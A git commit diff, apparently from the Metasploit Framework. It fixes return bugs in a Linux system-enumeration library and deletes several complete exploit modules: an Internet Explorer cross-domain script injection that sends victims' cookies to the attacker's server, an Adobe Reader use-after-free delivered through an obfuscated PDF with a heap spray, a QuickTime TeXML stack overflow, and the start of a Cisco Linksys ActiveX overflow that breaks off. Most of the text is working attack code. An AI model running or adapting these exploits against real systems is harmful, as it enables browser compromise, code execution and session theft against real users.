Add new functions and fix return bugs
This commit is contained in:
parent
57e243ac49
commit
1e34a6d3c6
|
@ -111,7 +111,7 @@ module System
|
|||
services = {}
|
||||
begin
|
||||
full = cmd_exec('netstat -tulpn')
|
||||
raise "You must be root to get listening ports" if full =~ /\(No info could be read/
|
||||
raise "You must be root to get listening ports" if full.include? '(No info could be read'
|
||||
lines = full.split("\n").size
|
||||
cmd = "netstat -tulpn | tail -n #{lines - 2}"
|
||||
full = cmd_exec(cmd)
|
||||
|
@ -122,7 +122,7 @@ module System
|
|||
full.split("\n").each do |p|
|
||||
ports << p.split('/')[1]
|
||||
end
|
||||
ports
|
||||
return ports
|
||||
else
|
||||
full.split("\n").each do |s|
|
||||
split = s.split('/')
|
||||
|
@ -167,9 +167,9 @@ module System
|
|||
cpuinfo = orig.split("\n\n")[0]
|
||||
# This is probably a more platform independent way to parse the results (compared to splitting and assigning preset indices to values)
|
||||
cpuinfo.split("\n").each do |l|
|
||||
info[:speed_mhz] = l.split(': ')[1].to_i if l =~ /cpu MHz/
|
||||
info[:product] = l.split(': ')[1] if l =~ /model name/
|
||||
info[:vendor] = l.split(': ')[1] if l =~ /vendor_id/
|
||||
info[:speed_mhz] = l.split(': ')[1].to_i if l.include? 'cpu MHz'
|
||||
info[:product] = l.split(': ')[1] if l.include? 'model name'
|
||||
info[:vendor] = l.split(': ')[1] if l.include? 'vendor_id'
|
||||
end
|
||||
info[:cores] = orig.split("\n\n").size
|
||||
info
|
||||
|
@ -237,7 +237,7 @@ module System
|
|||
pids = []
|
||||
full = cmd_exec('ps aux').to_s
|
||||
full.split("\n").each do |pid|
|
||||
pids << pid.split(' ')[1].to_i if pid =~ /#{program}/
|
||||
pids << pid.split(' ')[1].to_i if pid.include? program
|
||||
end
|
||||
pids
|
||||
end
|
||||
|
@ -249,7 +249,7 @@ module System
|
|||
def noexec?(mount_path)
|
||||
mount = cmd_exec('cat /proc/mounts').to_s
|
||||
mount.lines.each do |l|
|
||||
true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
|
||||
return true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
|
||||
end
|
||||
false
|
||||
rescue
|
||||
|
@ -263,13 +263,33 @@ module System
|
|||
def nosuid?(mount_path)
|
||||
mount = cmd_exec('cat /proc/mounts').to_s
|
||||
mount.lines.each do |l|
|
||||
true if l =~ Regexp.new("#{mount_path} (.*)nosuid(.*)")
|
||||
return true if l =~ Regexp.new("#{mount_path} (.*)nosuid(.*)")
|
||||
end
|
||||
false
|
||||
rescue
|
||||
raise 'Unable to check for nosuid volume'
|
||||
end
|
||||
|
||||
#
|
||||
# Checks for protected hardlinks on the system
|
||||
# @return [Boolean]
|
||||
#
|
||||
def protected_hardlinks?
|
||||
read_file('/proc/sys/fs/protected_hardlinks').to_s.eql? '1'
|
||||
rescue
|
||||
raise 'Could not determine protected_hardlinks status'
|
||||
end
|
||||
|
||||
#
|
||||
# Checks for protected symlinks on the system
|
||||
# @return [Boolean]
|
||||
#
|
||||
def protected_symlinks?
|
||||
read_file('/proc/sys/fs/protected_symlinks').to_s.eql? '1'
|
||||
rescue
|
||||
raise 'Could not determine protected_symlinks status'
|
||||
end
|
||||
|
||||
|
||||
end # System
|
||||
end # Linux
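Review bot: `mount_path` is interpolated unescaped into `Regexp.new` on the new `return true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")` line in noexec?, and again in nosuid?; a path containing regex metacharacters (`.`, `+`, `(`, `[`) either over-matches or raises RegexpError, which the bare `rescue` below turns into the generic 'Unable to check' error, hiding the real cause. Escape it in both methods: `return true if l =~ Regexp.new("#{Regexp.escape(mount_path)} (.*)noexec(.*)")` and the `nosuid` equivalent. In the new protected_hardlinks?/protected_symlinks? methods, `read_file(...).to_s.eql? '1'` will presumably always be false if read_file returns the raw sysctl content with its trailing newline — `.to_s.strip == '1'` would be safer; worth confirming against read_file's behaviour for each session type. noexec?'s body continues past its hunk (its rescue handler is outside the visible lines).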
|
||||
|
|
|
@ -1,152 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
|
||||
'Description' => %q{
|
||||
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
|
||||
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
|
||||
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
|
||||
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
|
||||
you are behind NAT.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'David Leo', # Original discovery
|
||||
'filedescriptor', # PoC
|
||||
'joev', # He figured it out really
|
||||
'sinn3r' # MSF
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-0072' ],
|
||||
[ 'OSVDB', '117876' ],
|
||||
[ 'MSB', 'MS15-018' ],
|
||||
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'DisclosureDate' => "Feb 1 2015"
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
|
||||
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
|
||||
])
|
||||
end
|
||||
|
||||
def setup
|
||||
if target_uri !~ /^http/i
|
||||
raise Msf::OptionValidateError.new(['TARGET_URI'])
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def target_uri
|
||||
datastore['TARGET_URI']
|
||||
end
|
||||
|
||||
def get_html
|
||||
@html ||= html
|
||||
end
|
||||
|
||||
def ninja_cookie_stealer_name
|
||||
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
|
||||
end
|
||||
|
||||
def get_uri(cli=self.cli)
|
||||
ssl = datastore["SSL"]
|
||||
proto = (ssl ? "https://" : "http://")
|
||||
if datastore['URIHOST']
|
||||
host = datastore['URIHOST']
|
||||
elsif (cli and cli.peerhost)
|
||||
host = Rex::Socket.source_address(cli.peerhost)
|
||||
else
|
||||
host = srvhost_addr
|
||||
end
|
||||
|
||||
if Rex::Socket.is_ipv6?(host)
|
||||
host = "[#{host}]"
|
||||
end
|
||||
|
||||
if datastore['URIPORT']
|
||||
port = ':' + datastore['URIPORT'].to_s
|
||||
elsif (ssl and datastore["SRVPORT"] == 443)
|
||||
port = ''
|
||||
elsif (!ssl and datastore["SRVPORT"] == 80)
|
||||
port = ''
|
||||
else
|
||||
port = ":" + datastore["SRVPORT"].to_s
|
||||
end
|
||||
|
||||
uri = proto + host + port + get_resource
|
||||
|
||||
uri
|
||||
end
|
||||
|
||||
def server_uri
|
||||
@server_uri ||= get_uri
|
||||
end
|
||||
|
||||
def js
|
||||
datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
|
||||
end
|
||||
|
||||
def html
|
||||
%Q|
|
||||
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
|
||||
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
|
||||
<script>
|
||||
window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
|
||||
var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
|
||||
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
|
||||
</script>
|
||||
|
|
||||
end
|
||||
|
||||
def run
|
||||
exploit
|
||||
end
|
||||
|
||||
def extract_cookie(uri)
|
||||
Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
case request.uri
|
||||
when /redirect\.php/
|
||||
print_status("Sending redirect")
|
||||
send_redirect(cli, "#{datastore['TARGET_URI']}")
|
||||
when /sleep\.php/
|
||||
sleep(3)
|
||||
send_response(cli, '')
|
||||
when /#{ninja_cookie_stealer_name}/
|
||||
data = extract_cookie(request.uri)
|
||||
if data.blank?
|
||||
print_status("The XSS worked, but no cookie")
|
||||
else
|
||||
print_status("Got cookie")
|
||||
print_line(data)
|
||||
report_note(
|
||||
:host => cli.peerhost,
|
||||
:type => 'ie.cookie',
|
||||
:data => data
|
||||
)
|
||||
path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
|
||||
vprint_good("Cookie stored as: #{path}")
|
||||
end
|
||||
else
|
||||
print_status("Sending HTML")
|
||||
send_response(cli, get_html)
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,220 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'zlib'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
|
||||
Professional versions up to and including 9.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # Found in the wild
|
||||
# Metasploit version by:
|
||||
'hdm',
|
||||
'pusscat',
|
||||
'jduck',
|
||||
'jabra'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-4324' ],
|
||||
[ 'BID', '37331' ],
|
||||
[ 'OSVDB', '60980' ],
|
||||
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-02.html' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# test results (on Windows XP SP3)
|
||||
# reader 6.0.1 - vulnerable / doesn't work
|
||||
# reader 7.0.5 - untested
|
||||
# reader 7.0.8 - untested
|
||||
# reader 7.0.9 - vulnerable / doesn't work
|
||||
# reader 7.1.0 - untested
|
||||
# reader 7.1.1 - untested
|
||||
# reader 8.0.0 - untested
|
||||
# reader 8.1.1 - works
|
||||
# reader 8.1.2 - untested
|
||||
# reader 8.1.3 - untested
|
||||
# reader 8.1.4 - untested
|
||||
# reader 8.1.5 - untested
|
||||
# reader 8.1.6 - untested
|
||||
# reader 9.0.0 - untested
|
||||
# reader 9.1.0 - works
|
||||
# reader 9.2 - works (no debugger, no DEP)
|
||||
[ 'Adobe Reader Windows English (JS Heap Spray)',
|
||||
{
|
||||
'Size' => (0x10000/2),
|
||||
'Ret' => 0x0c0c0c0c
|
||||
}
|
||||
],
|
||||
[ 'Adobe Reader Windows German (JS Heap Spray)',
|
||||
{
|
||||
'Size' => (0x10000/2),
|
||||
'Ret' => 0x0a0a0a0a
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 14 2009',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check_dependencies
|
||||
use_zlib
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Make some nops
|
||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
# Randomize variables
|
||||
#
|
||||
len = 72
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
vtbuf = [target.ret].pack('V') * 4
|
||||
vtbuf << rand_text_alpha(len - vtbuf.length)
|
||||
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
retstring = Rex::Text.to_unescape(vtbuf)
|
||||
|
||||
# The printd strings are 72 bytes (??)
|
||||
script = %Q|
|
||||
var #{randnop} = "#{nops}";
|
||||
var #{rand1} = unescape("#{shellcode}");
|
||||
var #{rand2} = unescape(#{randnop});
|
||||
var #{rand3} = unescape("#{retstring}");
|
||||
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
|
||||
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
|
||||
memory=new Array();
|
||||
for(i=0;i<0x2000;i++) { memory[i]= #{rand2} + #{rand1}; }
|
||||
util.printd("#{rand4}", new Date());
|
||||
util.printd("#{rand5}", new Date());
|
||||
try {this.media.newPlayer(null);} catch(e) {}
|
||||
util.printd(#{rand3}, new Date());
|
||||
|
|
||||
# Create the pdf
|
||||
pdf = make_pdf(script)
|
||||
|
||||
print_status("Sending #{self.name}")
|
||||
|
||||
send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })
|
||||
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
def random_non_ascii_string(count)
|
||||
result = ""
|
||||
count.times do
|
||||
result << (rand(128) + 128).chr
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def io_def(id)
|
||||
"%d 0 obj" % id
|
||||
end
|
||||
|
||||
def io_ref(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def n_obfu(str)
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
|
||||
result << "#%x" % c.unpack("C*")[0]
|
||||
else
|
||||
result << c
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def ascii_hex_whitespace_encode(str)
|
||||
result = ""
|
||||
whitespace = ""
|
||||
str.each_byte do |b|
|
||||
result << whitespace << "%02x" % b
|
||||
whitespace = " " * (rand(3) + 1)
|
||||
end
|
||||
result << ">"
|
||||
end
|
||||
|
||||
def make_pdf(js)
|
||||
|
||||
xref = []
|
||||
eol = "\x0d\x0a"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
|
||||
pdf = "%PDF-1.5" << eol
|
||||
pdf << "%" << random_non_ascii_string(4) << eol
|
||||
xref << pdf.length
|
||||
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
|
||||
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
pdf << "0 %d" % (xref.length + 1) << eol
|
||||
pdf << "0000000000 65535 f" << eol
|
||||
xref.each do |index|
|
||||
pdf << "%010d 00000 n" % index << eol
|
||||
end
|
||||
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
|
||||
pdf << "startxref" << eol
|
||||
pdf << xrefPosition.to_s() << eol
|
||||
pdf << "%%EOF" << eol
|
||||
|
||||
end
|
||||
end
|
|
@ -1,299 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking
|
||||
#})
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Apple QuickTime. When handling
|
||||
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
|
||||
gain arbitrary code execution under the context of the user. This is due to the
|
||||
QuickTime3GPP.gtx component not handling certain Style subfields properly, as the
|
||||
font-table field, which is used to trigger the overflow in this module. Because of
|
||||
QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be
|
||||
used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module
|
||||
has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Arezou Hosseinzad-Amirkhizi', # Vulnerability Discovery
|
||||
'juan vazquez' # Metasploit Module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '87087' ],
|
||||
[ 'CVE', '2012-3752' ],
|
||||
[ 'BID', '56557' ],
|
||||
[ 'URL', 'http://support.apple.com/kb/HT5581' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested with QuickTime 7.7.2
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 6 on Windows XP SP3', {} ],
|
||||
[ 'Firefox 3.5 on Windows XP SP3', {} ],
|
||||
[ 'Firefox 3.5.1 on Windows XP SP3', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Nov 07 2012',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
||||
])
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
|
||||
browser_name = ""
|
||||
if agent =~ /MSIE/
|
||||
browser_version = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
browser_name = "IE #{browser_version}"
|
||||
elsif agent =~ /Firefox\/3.5$/
|
||||
browser_name = "Firefox 3.5 "
|
||||
elsif agent =~ /Firefox\/3.5.1$/
|
||||
browser_name = "Firefox 3.5.1"
|
||||
elsif agent =~ /Opera\/9/
|
||||
browser_name = "Opera"
|
||||
end
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
print_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(client, request)
|
||||
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
# Avoid the attack if no suitable target found
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.3gp/
|
||||
print_status("Sending exploit TEXML (target: #{my_target.name})")
|
||||
|
||||
my_payload = "1" * (1024*16)
|
||||
|
||||
texml = <<-eos
|
||||
<?xml version="1.0"?>
|
||||
<?quicktime type="application/x-quicktime-texml"?>
|
||||
|
||||
<text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
|
||||
language="eng" timeScale="600"
|
||||
transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
|
||||
<sample duration="2400" keyframe="true">
|
||||
|
||||
<description format="tx3g" displayFlags="ScrollIn"
|
||||
horizontalJustification="Left"
|
||||
verticalJustification="Top"
|
||||
backgroundColor="0%, 0%, 0%, 100%">
|
||||
|
||||
<defaultTextBox x="0" y="0" width="176" height="60"/>
|
||||
<fontTable>
|
||||
<font id="1" name="Times"/>
|
||||
</fontTable>
|
||||
|
||||
<sharedStyles>
|
||||
<style id="1">
|
||||
{font-table: #{my_payload}}
|
||||
{font-style:normal}
|
||||
{font-weight: normal}
|
||||
{font-size: 10}
|
||||
{line-height: 100%}
|
||||
{text-align: right}
|
||||
{text-decoration: underline}
|
||||
{color: 100%, 100%, 100%, 100%}
|
||||
{backgroundcolor: 100%, 100%, 100%, 100%}
|
||||
</style>
|
||||
</sharedStyles>
|
||||
</description>
|
||||
|
||||
<sampleData scrollDelay="200"
|
||||
highlightColor="25%, 45%, 65%, 100%"
|
||||
targetEncoding="utf8">
|
||||
|
||||
<textBox x="10" y="10" width="156" height="40"/>
|
||||
<text styleID="1">What you need... Metasploit!</text>
|
||||
<highlight startMarker="1" endMarker="2"/>
|
||||
<blink startMarker="3" endMarker="4"/>
|
||||
</sampleData>
|
||||
</sample>
|
||||
</text3GTrack>
|
||||
eos
|
||||
|
||||
send_response(client, texml, { 'Content-Type' => "application/x-quicktime-texml" })
|
||||
|
||||
else
|
||||
print_status("Sending initial HTML")
|
||||
|
||||
url = ((datastore['SSL']) ? "https://" : "http://")
|
||||
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
|
||||
url << ":" + datastore['SRVPORT'].to_s
|
||||
url << get_resource
|
||||
|
||||
fname = rand_text_alphanumeric(4)
|
||||
|
||||
#ARCH used by the victim machine
|
||||
arch = Rex::Arch.endian(my_target.arch)
|
||||
nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
|
||||
code = Rex::Text.to_unescape(payload.encoded, arch)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
# Spray puts payload on 0x31313131
|
||||
if my_target.name =~ /IE/
|
||||
spray = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{code}");
|
||||
var #{randnop} = "#{nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
var offset = nops.substring(0, 0x800 - code.length);
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
heap_obj.gc();
|
||||
for (var i=0; i < 1600; i++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
JS
|
||||
|
||||
#Use heaplib
|
||||
js_spray = heaplib(spray)
|
||||
|
||||
#obfuscate on demand
|
||||
if datastore['OBFUSCATE']
|
||||
js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
|
||||
js_spray.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
else
|
||||
js_spray = <<-JS
|
||||
var shellcode = unescape("#{code}");
|
||||
var #{randnop} = "#{nops}";
|
||||
var bigblock = unescape(#{randnop});
|
||||
var headersize = 20;
|
||||
var slackspace = headersize + shellcode.length;
|
||||
while (bigblock.length < slackspace) bigblock += bigblock;
|
||||
var fillblock = bigblock.substring(0,slackspace);
|
||||
var block = bigblock.substring(0,bigblock.length - slackspace);
|
||||
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
|
||||
var memory = new Array();
|
||||
for (i = 0; i < 750; i++){ memory[i] = block + shellcode }
|
||||
JS
|
||||
end
|
||||
|
||||
content = "<html>"
|
||||
content << <<-JSPRAY
|
||||
<head>
|
||||
<script>
|
||||
#{js_spray}
|
||||
</script>
|
||||
</head>
|
||||
JSPRAY
|
||||
content << "<body>"
|
||||
|
||||
content << <<-ENDEMBED
|
||||
<OBJECT
|
||||
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
|
||||
WIDTH="1"
|
||||
HEIGHT="1"
|
||||
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
|
||||
<PARAM name="SRC" VALUE = "#{url}/#{fname}.3gp">
|
||||
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.3gp">
|
||||
<PARAM name="AUTOPLAY" VALUE = "true" >
|
||||
<PARAM name="TYPE" VALUE = "video/quicktime" >
|
||||
<PARAM name="TARGET" VALUE = "myself" >
|
||||
<EMBED
|
||||
SRC = "#{url}/#{fname}.3gp"
|
||||
QTSRC = "#{url}/#{fname}.3gp"
|
||||
TARGET = "myself"
|
||||
WIDTH = "1"
|
||||
HEIGHT = "1"
|
||||
AUTOPLAY = "true"
|
||||
PLUGIN = "quicktimeplugin"
|
||||
TYPE = "video/quicktime"
|
||||
CACHE = "false"
|
||||
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
|
||||
</EMBED>
|
||||
</OBJECT>
|
||||
ENDEMBED
|
||||
|
||||
content << "</body></html>"
|
||||
|
||||
send_response(client, content, { 'Content-Type' => "text/html" })
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
=begin
|
||||
* Routine checking only for '1'-'9' chars for the vaules on the vulnerable style fields (font-table, font-size and line-height)
|
||||
|
||||
int __fastcall sub_67EED2B0(int a1, int a2)
|
||||
{
|
||||
int result; // eax@1
|
||||
unsigned __int8 v3; // cl@2
|
||||
|
||||
for ( result = 0; ; ++result )
|
||||
{
|
||||
v3 = *(_BYTE *)a2++ - 0x30;
|
||||
if ( v3 > 9u )
|
||||
break;
|
||||
}
|
||||
return result;
|
||||
}
|
||||
=end
|
|
@ -1,255 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::Seh
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#
|
||||
#autopwn_info({
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
|
||||
# :method => "SetSource",
|
||||
# :rank => NormalRanking
|
||||
#})
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco Linksys PlayerPT ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15
|
||||
as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ
|
||||
Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in
|
||||
the SetSource method, allows to trigger a stack based buffer overflow which leads
|
||||
to code execution under the context of the user visiting a malicious web page.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'rgod', # Vuln discovery, PoC
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '80297' ],
|
||||
[ 'EDB', '18641' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
